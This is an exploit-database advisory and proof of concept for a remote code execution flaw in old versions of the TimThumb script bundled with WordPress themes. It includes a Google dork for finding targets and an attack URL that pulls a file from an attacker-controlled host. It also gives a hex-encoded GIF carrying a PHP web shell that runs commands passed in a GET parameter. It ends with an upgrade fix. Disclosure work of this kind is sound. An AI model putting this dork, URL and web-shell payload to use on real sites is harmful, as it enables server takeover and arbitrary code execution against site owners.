WordPress TimThumb Plugin - Remote Code Execution

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WordPress TimThumb Plugin - Remote Code Execution
# Published : 2011-08-03
# Author :
# Previous Title : WordPress Global Content Blocks plugin <= 1.2 SQL Injection Vulnerability
# Next Title : phpMyRealty <= v. 1.0.7 SQL Injection Vulnerability

# Exploit Title: WordPress TimThumb Plugin - Remote Code Execution
# Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com
# Date: 3rd August 2011
# Author: MaXe
# Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php
# Version: 1.32
# Screenshot: See attachment
# Tested on: Windows XP + Apache + PHP (XAMPP)
 
 
WordPress TimThumb (Theme) Plugin - Remote Code Execution
 
 
Versions Affected: 
1.* - 1.32 (Only version 1.19 and 1.32 were tested.)
(Version 1.33 did not save the cache file as .php)

 
Info: (See references for original advisory)
TimThumb is an image resizing utility, widely used in many WordPress themes.

 
External Links:
http://www.binarymoon.co.uk/projects/timthumb/
http://code.google.com/p/timthumb/
 
Credits: 
- Mark Maunder (Original Researcher)
- MaXe (Indepedendent Proof of Concept Writer)
 
 
-:: The Advisory ::-
TimThumb is prone to a Remote Code Execution vulnerability, due to the
script does not check remotely cached files properly. By crafting a
special image file with a valid MIME-type, and appending a PHP file at
the end of this, it is possible to fool TimThumb into believing that it
is a legitimate image, thus caching it locally in the cache directory.


Attack URL: (Note! Some websites uses Base64 Encoding of the src GET-request.)
http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php

Stored file on the Target: (This can change from host to host.)
1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src);
1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src);
md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format.


Proof of Concept File:
x47x49x46x38x39x61x01x00x01x00x80x00x00
xFFxFFxFFx00x00x00x21xF9x04x01x00x00x00
x00x2Cx00x00x00x00x01x00x01x00x00x02x02
x44x01x00x3Bx00x3Cx3Fx70x68x70x20x40x65
x76x61x6Cx28x24x5Fx47x45x54x5Bx27x63x6D
x64x27x5Dx29x3Bx20x3Fx3Ex00

(Transparent GIF + <?php @eval($_GET['cmd']) ?>

 
 
-:: Solution ::-
Update to the latest version 1.34 or delete the timthumb file.

NOTE: This file is often renamed and you should therefore issue
a command like this in a terminal: (Thanks to rAWjAW for this info.)
find . | grep php | xargs grep -s timthumb
 
 
Disclosure Information:
- Vulnerability Disclosed (Mark Maunder): 1st August 2011
- Vulnerability Researched (MaXe): 2nd August 2011
- Disclosed at The Exploit Database: 3rd August 2011

 
 
References:
http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/
http://markmaunder.com/2011/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/
http://code.google.com/p/timthumb/issues/detail?id=212
http://programming.arantius.com/the+smallest+possible+gif